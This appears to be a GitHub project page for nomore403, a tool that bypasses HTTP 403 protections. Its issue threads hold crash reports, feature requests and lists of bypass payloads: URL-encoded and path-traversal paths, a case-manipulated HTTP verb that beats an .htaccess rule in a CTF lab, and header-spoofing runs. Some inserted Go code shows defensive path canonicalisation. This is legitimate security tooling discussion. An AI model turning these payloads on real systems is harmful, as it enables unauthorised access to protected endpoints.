nomore403's Introduction

Hey there! 🦊

Hi, I'm Daniel Púa (a.k.a. devploit) and I'm an infosec lover from Cádiz (Spain). I'm living in Malaga, where I work and do my stuff. I also participate in CTFs as a hobby. My teams are ripp3rs & R3Vengers.

I'm currently working at Freepik Company as Security Tech Lead.

In addition to working and participating in CTFs I also (try to) maintain a repository of payloads that may be useful for other security researchers. You can visit it at: pwny.cc.

Also, you can follow me on:

  • Blog: devploit
  • GitHub: devploit
  • Twitter: devploit
  • Linkedin: Daniel Púa
  • HackTheBox: devploit
  • HackerOne: devploit
  • Intigriti: devploit
  • CTFTime: devploit

nomore403's People

Contributors

albertofdr, dependabot[bot], devploit, eze-kiel, gister9000, itsignacioportal, jaikishantulswani, jorgectf, mbrg, mnthomson, mrthe, nxczje, six2dez

nomore403's Issues

panic: runtime error: index out of range [1] with length 1

Fails to parse request from Burp:

./dontgo403 -r /home/kali/tmp/req 
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
dontgo403/cmd.requester({0xc00016a100, 0x7d}, {0x0?, 0x0?}, {0x0, 0x0}, {0xc00017e400?, 0x10, 0x10}, {0x0, ...}, ...)
	/home/kali/hacktools/web/dontgo403/cmd/requester.go:393 +0x747
dontgo403/cmd.loadFlagsFromRequestFile({0x7fffd2c94fb1?, 0x0?}, 0x0, 0x0?)
	/home/kali/hacktools/web/dontgo403/cmd/api.go:139 +0x305
dontgo403/cmd.glob..func1(0xb7cd00?, {0x860f2b?, 0x2?, 0x2?})
	/home/kali/hacktools/web/dontgo403/cmd/root.go:57 +0x291
github.com/spf13/cobra.(*Command).execute(0xb7cd00, {0xc00011c160, 0x2, 0x2})
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7cd00)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
	/home/kali/hacktools/web/dontgo403/cmd/root.go:75 +0x25
main.main()
	/home/kali/hacktools/web/dontgo403/main.go:22 +0x17

Here is the request:

cat ~/tmp/req 
POST /openai/deployments/text-gpt-4-32k/chat/completions?api-version=2023-03-15-preview HTTP/1.1
Host: cdo-eastus-openai.openai.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Connection: close
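
The cause of the panic at requester.go:393 is not shown on this page. As an added example (not the project's code), here is one way to parse a saved request like the one above with net/http instead of indexing into split strings, so that malformed input produces an error; `ParseRequestFile`, `ParsedRequest` and the sample request (placeholder host and path) are constructed for this illustration.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net/http"
	"strings"
)

// sampleRequest is constructed for this example: same shape as the request in
// the report (POST, query string, Content-Length: 0, no body, LF line endings,
// no terminating blank line). Host and path are placeholders.
const sampleRequest = "POST /deployments/demo/chat/completions?api-version=1 HTTP/1.1\n" +
	"Host: api.example.test\n" +
	"Accept-Encoding: gzip, deflate\n" +
	"Pragma: no-cache\n" +
	"Content-Length: 0\n" +
	"Connection: close\n"

// ParsedRequest holds what a replaying tool needs from a saved request.
type ParsedRequest struct {
	Method  string
	Target  string      // request-target exactly as written in the file
	Host    string      // net/http promotes the Host header to this field
	Headers http.Header // remaining headers
	Body    string
}

// ParseRequestFile parses the text of a saved raw HTTP request. It accepts LF
// or CRLF line endings and a missing blank line after the headers, and it
// returns an error (never panics) on malformed input. Line endings inside the
// body are normalised to LF as a side effect.
func ParseRequestFile(raw string) (*ParsedRequest, error) {
	norm := strings.TrimLeft(strings.ReplaceAll(raw, "\r\n", "\n"), "\n")
	// Everything before the first blank line is the request line plus headers.
	head, body, _ := strings.Cut(norm, "\n\n")
	head = strings.TrimRight(head, "\n")
	if head == "" {
		return nil, errors.New("request file is empty")
	}
	// Rebuild the wire form that http.ReadRequest expects.
	wire := strings.ReplaceAll(head, "\n", "\r\n") + "\r\n\r\n" + body
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(wire)))
	if err != nil {
		return nil, fmt.Errorf("malformed request file: %w", err)
	}
	defer req.Body.Close()
	return &ParsedRequest{
		Method:  req.Method,
		Target:  req.RequestURI,
		Host:    req.Host,
		Headers: req.Header,
		Body:    body,
	}, nil
}

func main() {
	p, err := ParseRequestFile(sampleRequest)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(p.Method, p.Host, p.Target)

	// A header line without a colon is reported as an error.
	_, err = ParseRequestFile("GET /x HTTP/1.1\nHost example.test\n")
	fmt.Println("malformed input:", err)
}
```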

Tag the source

It would be very helpful if you could tag releases as well. This would enable distributions to fetch the source from GitHub instead of working with git checkouts.

Thanks

invalid URL escape "%"

I am getting this when the program is starting:
CUSTOM PATHS

[####] CUSTOM PATHS [####]
2022/09/11 13:37:26 parse "https://REDACTED.DOMAIN/admin.php%": invalid URL escape "%"

Errors

Hi,

The tool is super cool and super fast, I really appreciate the time for creating this tool. But I am facing issues with this tool. The first issue is: when I run the tool it works fine, but when it comes to the CUSTOM PATHS exploit it shows me this error:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x7518b4]

goroutine 2396 [running]:
dontgo403/cmd.requestMidPaths.func1({0xc000fcb2dc, 0x4})
/opt/tools/dontgo403/cmd/requester.go:268 +0x474
created by dontgo403/cmd.requestMidPaths
/opt/tools/dontgo403/cmd/requester.go:250 +

The second issue is, sometimes the tool works fine but it gives me this error:
2022/01/18 22:00:34 Patch "https://www.google.com/": dial tcp: i/o timeout

is urlencode(random path strings) to dontgo403?

For example, we want to bypass the actuator/env endpoint

curl http://[MASK].com/actuator/env

Use dontgo403 (default config)

curl http://[MASK].com/actuator/env;%2f..%2f..

Response: 403 Forbidden

When we add urlencode(some sensitive files), /actuator/env

curl http://[MASK].com/act%75ato/env;%2f..%2f..

Response:

 {
  "activeProfiles" : [ "dev" ],
  "propertySources" : [ {
  .....

Maybe this method can bypass some incorrect nginx configuration.

My tools support this feature, but I think your tool is better than mine in terms of coding structure and practicality. If I had found your tool earlier, I wouldn't have reinvented the wheel. LOL

I hope you will consider adding this feature.
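
The defensive counterpart of the behaviour described in this issue, as an added example that is not part of the original post or the project: an access check that canonicalises the request path before matching the protected prefix, beside the naive raw-prefix check that a percent-encoded letter slips past. The `/actuator` prefix comes from the post; the function names, the policy of rejecting path parameters and encoded separators, and the sample paths are constructed for this illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
	"unicode"
)

// Verdict is the outcome of the access decision for one request path.
type Verdict string

const (
	Allow  Verdict = "allow"
	Forbid Verdict = "forbid" // canonical path is under the protected prefix
	Reject Verdict = "reject" // malformed or ambiguous path, answer 400
)

// protectedPrefix is the endpoint family named in the post.
const protectedPrefix = "/actuator"

// NaiveForbidden is the weak check: a prefix match on the raw, undecoded path.
func NaiveForbidden(rawPath string) bool {
	return strings.HasPrefix(rawPath, protectedPrefix)
}

// Canonicalize decodes each segment once, refuses anything a proxy and a
// backend could interpret differently (";" path parameters, encoded "/" or
// "\", double encoding, control characters), then resolves "." and "..".
func Canonicalize(rawPath string) (string, error) {
	if !strings.HasPrefix(rawPath, "/") {
		return "", fmt.Errorf("path %q is not absolute", rawPath)
	}
	segs := strings.Split(rawPath, "/")
	for i, seg := range segs {
		if strings.Contains(seg, ";") {
			return "", fmt.Errorf("path parameter in segment %q", seg)
		}
		dec, err := url.PathUnescape(seg)
		if err != nil {
			return "", fmt.Errorf("bad escape in segment %q: %w", seg, err)
		}
		if strings.ContainsAny(dec, "/\\%") || strings.IndexFunc(dec, unicode.IsControl) >= 0 {
			return "", fmt.Errorf("encoded separator, escape or control character in %q", seg)
		}
		segs[i] = dec
	}
	return path.Clean(strings.Join(segs, "/")), nil
}

// Decide applies the prefix rule to the canonical path, case-insensitively.
func Decide(rawPath string) Verdict {
	canon, err := Canonicalize(rawPath)
	if err != nil {
		return Reject
	}
	lower := strings.ToLower(canon)
	if lower == protectedPrefix || strings.HasPrefix(lower, protectedPrefix+"/") {
		return Forbid
	}
	return Allow
}

func main() {
	// Constructed sample paths following the patterns shown in the post.
	samples := []string{
		"/actuator/env",
		"/act%75ator/env",
		"/act%75ator/env;%2f..%2f..",
		"/public/../actuator/env",
		"/%252e%252e/actuator",
		"/health",
	}
	for _, p := range samples {
		fmt.Printf("%-30s naive-forbidden=%-5v decision=%s\n", p, NaiveForbidden(p), Decide(p))
	}
}
```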

Ability to specify custom payload position(s)

Currently, the payload position defaults to the end of the URL. Being able to specify a custom payload position would be beneficial in certain cases.

For example:
./nomore -u example.com/organization/100/user/200?foo=bar

In this case, one may want to target the "organization ID" (100) and/or the "user ID" (200) instead of inserting payloads at the end.

An added bonus would be if it was possible to specify multiple positions.

Flags

@devploit Needed some functionality like -r for redirect (optional) and also an argument to avoid the host if it throws 429 Status code

Regarding the issue of release versions

Why are you still packing the packages when there are no payloads in the releases package? Is the file size in your releases surprisingly 8M? What exactly did it put?

Dos -issue

When I try to bypass 403 it sends lots of requests, so a low-bandwidth server can't handle those requests

Tool Crash

[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x468041]
goroutine 1 [running]:
fmt.(*buffer).writeString(...)
/usr/lib/go-1.19/src/fmt/print.go:82
fmt.(*fmt).padString(0x41b7c6?, {0x0, 0x13})
/usr/lib/go-1.19/src/fmt/format.go:110 +0x247
fmt.(*fmt).fmtS(0xc0002d00d0?, {0x0?, 0xc00010c800?})
/usr/lib/go-1.19/src/fmt/format.go:359 +0x3f
fmt.(*pp).fmtString(0x4f4bc6?, {0x0?, 0xc0004429e9?}, 0x0?)
/usr/lib/go-1.19/src/fmt/print.go:474 +0x86
fmt.(*pp).printArg(0xc0002d00d0, {0x7e7bc0?, 0xc0004729a0}, 0x76)
/usr/lib/go-1.19/src/fmt/print.go:725 +0x21e
fmt.(*pp).doPrintf(0xc0002d00d0, {0xc000442a07, 0x9}, {0xc00010cac8?, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:1057 +0x288
fmt.Fprintf({0x919d00, 0xc000706580}, {0xc000442a07, 0x9}, {0xc00010cac8, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:204 +0x75
github.com/cheynewallace/tabby.(*Tabby).AddLine(0xc000014008, {0xc00010cac8, 0x3, 0x3})
/root/go/pkg/mod/github.com/cheynewallace/[email protected]/tabby.go:31 +0x59
dontgo403/cmd.printResponse({0xc00092e000, 0x550, 0xc0000264ac?})
/home/dontgo403/cmd/requester.go:36 +0x2f6
dontgo403/cmd.requestHeaders({0xc0003ee4e0, 0x2f}, {0xc0005926e0, 0x1, 0x1}, 0xc000169b90, {0x0, 0x0}, {0x7ffcc82d3310, 0xe}, ...)
/home/dontgo403/cmd/requester.go:136 +0x2d3
dontgo403/cmd.requester({0xc000129919, 0x2e}, {0x0?, 0x0?}, {0x7ffcc82d3322, 0x6f}, {0xc000037100, 0x1, 0x0?}, {0x0, ...}, ...)
/home/dontgo403/cmd/requester.go:291 +0x385
dontgo403/cmd.glob..func1(0xb7bd80?, {0x861224?, 0x6?, 0x6?})
/home/dontgo403/cmd/root.go:48 +0x31c
github.com/spf13/cobra.(*Command).execute(0xb7bd80, {0xc000024080, 0x6, 0x6})
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7bd80)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
/home/dontgo403/cmd/root.go:63 +0x25
main.main()
/home/dontgo403/main.go:22 +0x17

Input List / Output

Feature Request

Description:

It would be useful to have a -u flag that can take a URL (as it currently does), but could also accept a file containing multiple URLs as input. Additionally, it would be beneficial to have a -o option to save results and a -f option to choose JSON output.

Required Features:

  1. -u flag:

    • Accepts a single URL as input.
    • Accepts a file containing multiple URLs as input.
  2. -o option:

    • Saves results to a specified location.
  3. -f option:

    • Allows choosing JSON format for output.

Benefits:

  • Improved flexibility in input handling.
  • Enhanced usability with options for saving and output formatting.

HTTP VeRbS and Case Sensitivity

Hello,

Thanks for your Great Work!

Is it possible to add HTTP VERB TAMPERING Methods using Case Sensitivity Manipulation?
Like:
GeT, gEt, poST, PosT etc?

Use case:

------------------------CTF--------------------
cat /var/www/html/admin/.htaccess 
<If "%{REQUEST_METHOD} == 'HEAD' || %{REQUEST_METHOD} == 'OPTIONS' || %{REQUEST_METHOD} == 'PATCH' ||  %{REQUEST_METHOD} == 'GET' || %{REQUEST_METHOD} == 'POST' || %{REQUEST_METHOD} == 'PUT' || %{REQUEST_METHOD} == 'DELETE' || %{REQUEST_METHOD} == 'TRACE'"> 

deny from all
</If>
#</Directory>
-------------------------------------------------
WooZooO@Priv:~$ curl -X POST http://172.16.67.124/admin/index.php -I
HTTP/1.1 403 Forbidden
Date: Tue, 19 Mar 2024 05:56:01 GMT
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1

WooZooO@Priv:~$ curl -X PoST http://172.16.67.124/admin/index.php -I
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2024 05:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 96
Content-Type: text/html; charset=UTF-8

AFAIK the current version of "nomore403" doesn't use these methods:

./nomore403 --random-agent -i "192.168.12.12" -v -u http://172.16.67.124/admin/ -r --random-agent  -H "Hello: Cookie"

    ________  ________  ________  ________  ________  ________  ________  ________  ________
   ╱     ╱  ╲╱        ╲╱    ╱   ╲╱        ╲╱        ╲╱        ╲╱    ╱   ╲╱        ╲╱__      ╲
  ╱         ╱    ╱    ╱         ╱    ╱    ╱    ╱    ╱       __╱         ╱    ╱    ╱__       ╱
 ╱         ╱         ╱         ╱         ╱        _╱       __/____     ╱         ╱         ╱
 ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱    ╱____╱╲________╱╲________╱
	
Target: 		http://172.16.67.124/admin/
Headers: 		{User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15}
Headers: 		{Hello  Cookie}
Proxy: 			false
User Agent: 		Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15
Method: 		GET
Payloads folder: 	payloads
Custom bypass IP: 	192.168.12.12
Follow Redirects: 	true
Rate Limit detection: 	false
Verbose: 		true

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 	  372 bytes http://172.16.67.124/admin/

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━
200 	  393 bytes TRACE
403 	  372 bytes COPY
400 	  392 bytes CONNECT
403 	  372 bytes VERSION-CONTROL
403 	  372 bytes OPTIONS
403 	  372 bytes PUT
403 	  372 bytes POUET
403 	  372 bytes TRACK
403 	  372 bytes POST
403 	  372 bytes MOVE
403 	  372 bytes PATCH
403 	  143 bytes HEAD
403 	  372 bytes LABEL
403 	  372 bytes GET
403 	  372 bytes UNCHECKOUT
403 	  372 bytes DELETE
403 	  372 bytes LOCK
403 	  372 bytes UPDATE

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━
403 	  372 bytes Request-Uri: 192.168.12.12
403 	  372 bytes Referrer: 192.168.12.12
403 	  372 bytes X-Forwarded-Proto: 192.168.12.12
403 	  372 bytes Referer: 192.168.12.12
403 	  372 bytes X-Forwarded-Host: 192.168.12.12
403 	  372 bytes Redirect: 192.168.12.12
403 	  372 bytes X-Forwarded-For-Original: 192.168.12.12
403 	  372 bytes Proxy-Host: 192.168.12.12
403 	  372 bytes X-Referrer: 192.168.12.12
403 	  372 bytes Proxy: 192.168.12.12
403 	  372 bytes Proxy-Url: 192.168.12.12
403 	  372 bytes Real-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Originating-IP: 192.168.12.12
403 	  372 bytes Http-Url: 192.168.12.12
403 	  372 bytes X-Forwarded-By: 192.168.12.12
403 	  372 bytes X-Proxy-Url: 192.168.12.12
403 	  372 bytes X-ProxyUser-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded: 192.168.12.12
403 	  372 bytes Forwarded-For-Ip: 192.168.12.12
403 	  372 bytes Profile: 192.168.12.12
403 	  372 bytes Origin: 192.168.12.12
403 	  372 bytes X-Real-IP: 192.168.12.12
403 	  372 bytes Host: 192.168.12.12
403 	  372 bytes X-Original-URL: 192.168.12.12
403 	  372 bytes Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forward-For: 192.168.12.12
403 	  372 bytes X-Original-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Forward: 192.168.12.12
403 	  372 bytes X-HTTP-Host-Override: 192.168.12.12
403 	  372 bytes X-Host: 192.168.12.12
403 	  372 bytes X-HTTP-DestinationURL: 192.168.12.12
403 	  372 bytes X-Originally-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forwarded-Server: 192.168.12.12
403 	  372 bytes X-Forwarder-For: 192.168.12.12
403 	  372 bytes Uri: 192.168.12.12
403 	  372 bytes Forwarded: 192.168.12.12
403 	  372 bytes Client-IP: 192.168.12.12
403 	  372 bytes True-Client-IP: 192.168.12.12
403 	  372 bytes Destination: 192.168.12.12
403 	  372 bytes X-Arbitrary: 192.168.12.12
403 	  372 bytes CF-Connecting_IP: 192.168.12.12
403 	  372 bytes X-Custom-IP-Authorization: 192.168.12.12
403 	  372 bytes Access-Control-Allow-Origin: 192.168.12.12
403 	  372 bytes Base-Url: 192.168.12.12
403 	  372 bytes X-Client-IP: 192.168.12.12
403 	  372 bytes Url: 192.168.12.12
403 	  372 bytes CF-Connecting-IP: 192.168.12.12
403 	  372 bytes X-Remote-IP: 192.168.12.12
403 	  372 bytes X-Rewrite-URL: 192.168.12.12
403 	  372 bytes X-WAP-Profile: 192.168.12.12
403 	  372 bytes X-Real-Ip: 192.168.12.12
403 	  372 bytes X-HTTP-Method-Override POST
403 	  372 bytes X-True-IP: 192.168.12.12
403 	  372 bytes Referer /admin
403 	  372 bytes X-Rewrite-URL /admin
403 	  372 bytes X-Forwarded-Port 80
403 	  372 bytes X-Override-URL /admin
403 	  372 bytes X-Forwarded-Port 8443
403 	  372 bytes X-Forwarded-Port 8080
403 	  372 bytes X-Forwarded-Port 4443
403 	  372 bytes X-Forwarded-Port 443
403 	  372 bytes X-Original-URL /admin
403 	  372 bytes X-HTTP-Method-Override PUT

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
403 	  373 bytes http://172.16.67.124/admin/1
403 	  372 bytes http://172.16.67.124/admin//.
403 	  372 bytes http://172.16.67.124/admin/?
403 	  372 bytes http://172.16.67.124/admin/??
403 	  376 bytes http://172.16.67.124/admin/.svc
403 	  377 bytes http://172.16.67.124/admin/.wsdl
403 	  376 bytes http://172.16.67.124/admin/.svc?wsdl
403 	  372 bytes http://172.16.67.124/admin//
403 	  373 bytes http://172.16.67.124/admin/0
403 	  372 bytes http://172.16.67.124/admin///
403 	  375 bytes http://172.16.67.124/admin/..;
403 	  372 bytes http://172.16.67.124/admin/./
403 	  376 bytes http://172.16.67.124/admin/..\;
403 	  372 bytes http://172.16.67.124/admin//
403 	  376 bytes http://172.16.67.124/admin/.css
403 	  377 bytes http://172.16.67.124/admin/.html
403 	  373 bytes http://172.16.67.124/admin/%61
403 	  372 bytes http://172.16.67.124/admin/.
403 	  373 bytes http://172.16.67.124/admin/-
403 	  372 bytes http://172.16.67.124/admin/?debug=true
403 	  372 bytes http://172.16.67.124/admin/?
403 	  377 bytes http://172.16.67.124/admin/&
403 	  372 bytes http://172.16.67.124/admin/??
403 	  372 bytes http://172.16.67.124/admin/?WSDL
403 	  372 bytes http://172.16.67.124/admin/?debug=1
403 	  377 bytes http://172.16.67.124/admin/.json
403 	  372 bytes http://172.16.67.124/admin///
403 	  372 bytes http://172.16.67.124/admin/???
403 	  379 bytes http://172.16.67.124/admin/.random
403 	  376 bytes http://172.16.67.124/admin/\/\/
403 	  377 bytes http://172.16.67.124/admin/debug
403 	  376 bytes http://172.16.67.124/admin/.php
403 	  372 bytes http://172.16.67.124/admin/?testparam
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin/?param
403 	  374 bytes http://172.16.67.124/admin/%20/
403 	  373 bytes http://172.16.67.124/admin/%20
403 	  373 bytes http://172.16.67.124/admin/%0D
403 	  373 bytes http://172.16.67.124/admin/%0A
404 	  368 bytes http://172.16.67.124/admin/%00
403 	  373 bytes http://172.16.67.124/admin/%09
403 	  372 bytes http://172.16.67.124/admin/#test
403 	  372 bytes http://172.16.67.124/admin/#
403 	  375 bytes http://172.16.67.124/admin/°/
403 	  376 bytes http://172.16.67.124/admin/..;/
403 	  372 bytes http://172.16.67.124/admin/#/./
403 	  372 bytes http://172.16.67.124/admin/#/
403 	  376 bytes http://172.16.67.124/admin//..;/
403 	  377 bytes http://172.16.67.124/admin/..\;/
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin//./
403 	  373 bytes http://172.16.67.124/admin//*
403 	  377 bytes http://172.16.67.124/admin/false
403 	  376 bytes http://172.16.67.124/admin//..%3B/
404 	  376 bytes http://172.16.67.124/admin/;%2f..%2f..%2f
403 	  373 bytes http://172.16.67.124/admin/%3f
403 	  377 bytes http://172.16.67.124/admin/%26
403 	  373 bytes http://172.16.67.124/admin/%23
403 	  373 bytes http://172.16.67.124/admin/%25
403 	  376 bytes http://172.16.67.124/admin/null
403 	  376 bytes http://172.16.67.124/admin/true
403 	  372 bytes http://172.16.67.124/%2e/admin/
404 	  372 bytes http://172.16.67.124/%252f/admin/
404 	  369 bytes http://172.16.67.124/%20admin/
404 	  370 bytes http://172.16.67.124/%20/admin/
404 	  369 bytes http://172.16.67.124/%23admin/
404 	  374 bytes http://172.16.67.124/%252f%252fadmin/
404 	  370 bytes http://172.16.67.124/%23%3fadmin/
404 	  367 bytes http://172.16.67.124/%admin/
404 	  369 bytes http://172.16.67.124/%09admin/
404 	  371 bytes http://172.16.67.124/%09..admin/
404 	  370 bytes http://172.16.67.124/%09;admin/
404 	  369 bytes http://172.16.67.124/%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%20%23admin/
404 	  370 bytes http://172.16.67.124/%2f%23admin/
404 	  370 bytes http://172.16.67.124/%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3b%2fadmin/
200 	 3427 bytes http://172.16.67.124/#admin/
404 	  364 bytes http://172.16.67.124/..%00/admin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e.admin/
404 	  377 bytes http://172.16.67.124/%3b%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f..admin/
404 	  373 bytes http://172.16.67.124/%26admin/
404 	  369 bytes http://172.16.67.124/%2eadmin/
200 	 3427 bytes http://172.16.67.124/#?admin/
404 	  370 bytes http://172.16.67.124/%09%3badmin/
404 	  370 bytes http://172.16.67.124/%2e%2eadmin/
404 	  371 bytes http://172.16.67.124/%2e%2e%2fadmin/
400 	  392 bytes http://172.16.67.124/%2e%2e/admin/
404 	  373 bytes http://172.16.67.124/&admin/
404 	  370 bytes http://172.16.67.124/..admin/
400 	  392 bytes http://172.16.67.124/.%2e/admin/
404 	  370 bytes http://172.16.67.124/%3f%23admin/
404 	  370 bytes http://172.16.67.124/%3f%3fadmin/
404 	  377 bytes http://172.16.67.124/%3b/%2e%2e/..%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b/%2e.admin/
404 	  372 bytes http://172.16.67.124/..%0d/admin/
404 	  369 bytes http://172.16.67.124/%3fadmin/
404 	  372 bytes http://172.16.67.124/%3b/..admin/
404 	  375 bytes http://172.16.67.124/%3b//%2f../admin/
404 	  370 bytes http://172.16.67.124/%3b%09admin/
404 	  369 bytes http://172.16.67.124/%3badmin/
404 	  370 bytes http://172.16.67.124/%2f/admin/
404 	  371 bytes http://172.16.67.124/..%09admin/
404 	  370 bytes http://172.16.67.124/%2f%3fadmin/
404 	  375 bytes http://172.16.67.124/%3b/%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/%2f%3b%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3f/admin/
404 	  364 bytes http://172.16.67.124/..%00;/admin/
404 	  371 bytes http://172.16.67.124/..%3Badmin/
404 	  371 bytes http://172.16.67.124/..%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e%2eadmin/
400 	  392 bytes http://172.16.67.124/../admin/
404 	  373 bytes http://172.16.67.124/..%0d;/admin/
403 	  372 bytes http://172.16.67.124/.//./admin/
404 	  364 bytes http://172.16.67.124/..%00/;admin/
400 	  392 bytes http://172.16.67.124/.././admin/
404 	  371 bytes http://172.16.67.124/.;/admin/
404 	  373 bytes http://172.16.67.124/..%ff/;admin/
404 	  372 bytes http://172.16.67.124/..%5c/admin/
404 	  371 bytes http://172.16.67.124/..%5cadmin/
404 	  373 bytes http://172.16.67.124/..;%ff/admin/
404 	  373 bytes http://172.16.67.124/..;%0d/admin/
404 	  365 bytes http://172.16.67.124/..;%00/admin/
404 	  371 bytes http://172.16.67.124/..%ffadmin/
404 	  372 bytes http://172.16.67.124/.\;/admin/
404 	  371 bytes http://172.16.67.124//%252fadmin/
404 	  370 bytes http://172.16.67.124//%2e%2eadmin/
404 	  372 bytes http://172.16.67.124//%252e/admin/
404 	  375 bytes http://172.16.67.124//%252e%253b/admin/
404 	  375 bytes http://172.16.67.124//%252e%252f/admin/
404 	  373 bytes http://172.16.67.124/..%0d/;admin/
404 	  373 bytes http://172.16.67.124/..;\;admin/
404 	  372 bytes http://172.16.67.124/..\;admin/
404 	  373 bytes http://172.16.67.124/..;\\admin/
404 	  372 bytes http://172.16.67.124/..\\admin/
403 	  372 bytes http://172.16.67.124/./admin/
404 	  369 bytes http://172.16.67.124/./.admin/
404 	  372 bytes http://172.16.67.124/..;/admin/
403 	  372 bytes http://172.16.67.124//admin/
404 	  371 bytes http://172.16.67.124/..;admin/
404 	  373 bytes http://172.16.67.124/.jsonadmin/
404 	  371 bytes http://172.16.67.124//%20%20/admin/
403 	  377 bytes http://172.16.67.124/.htmladmin/
404 	  363 bytes http://172.16.67.124//%20#admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%253b/admin/
400 	  392 bytes http://172.16.67.124//%2e%2e/admin/
404 	  372 bytes http://172.16.67.124//%2e%2e%3b/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b/admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%252f/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b//admin/
404 	  371 bytes http://172.16.67.124//%2e%2f/admin/
404 	  373 bytes http://172.16.67.124/..%ff;/admin/
404 	  369 bytes http://172.16.67.124//%2fadmin/
404 	  370 bytes http://172.16.67.124//%3b/admin/
403 	  372 bytes http://172.16.67.124//%2e//admin/
404 	  371 bytes http://172.16.67.124//..%2fadmin/
404 	  369 bytes http://172.16.67.124//*admin/
404 	  370 bytes http://172.16.67.124//*/admin/
403 	  372 bytes http://172.16.67.124//%2e/admin/
404 	  370 bytes http://172.16.67.124//%20%23admin/
404 	  369 bytes http://172.16.67.124//.admin/
400 	  392 bytes http://172.16.67.124//../admin/
404 	  370 bytes http://172.16.67.124//..admin/
403 	  372 bytes http://172.16.67.124//../../..//admin/
400 	  392 bytes http://172.16.67.124//../..//../admin/
400 	  392 bytes http://172.16.67.124//../..;/admin/
404 	  374 bytes http://172.16.67.124//..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../;/../admin/
400 	  392 bytes http://172.16.67.124//..//../admin/
400 	  392 bytes http://172.16.67.124//../.;/../admin/
403 	  372 bytes http://172.16.67.124//../..//admin/
400 	  392 bytes http://172.16.67.124//..//../../admin/
404 	  372 bytes http://172.16.67.124//..//..;/admin/
400 	  392 bytes http://172.16.67.124//.././../admin/
400 	  392 bytes http://172.16.67.124//../;/admin/
400 	  392 bytes http://172.16.67.124//../../admin/
404 	  377 bytes http://172.16.67.124//..%2f..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../../../admin/
403 	  372 bytes http://172.16.67.124//..//admin/
404 	  372 bytes http://172.16.67.124//..;%2fadmin/
400 	  392 bytes http://172.16.67.124///../../admin/
403 	  372 bytes http://172.16.67.124//..;/../admin/
403 	  372 bytes http://172.16.67.124///admin/
404 	  369 bytes http://172.16.67.124///.admin/
404 	  370 bytes http://172.16.67.124///..admin/
403 	  372 bytes http://172.16.67.124///./admin/
404 	  380 bytes http://172.16.67.124//..;%2f..;%2f..;%2fadmin/
404 	  370 bytes http://172.16.67.124////..admin/
404 	  371 bytes http://172.16.67.124//.;//admin/
404 	  372 bytes http://172.16.67.124//..;/admin/
400 	  392 bytes http://172.16.67.124////../admin/
404 	  372 bytes http://172.16.67.124//..;//../admin/
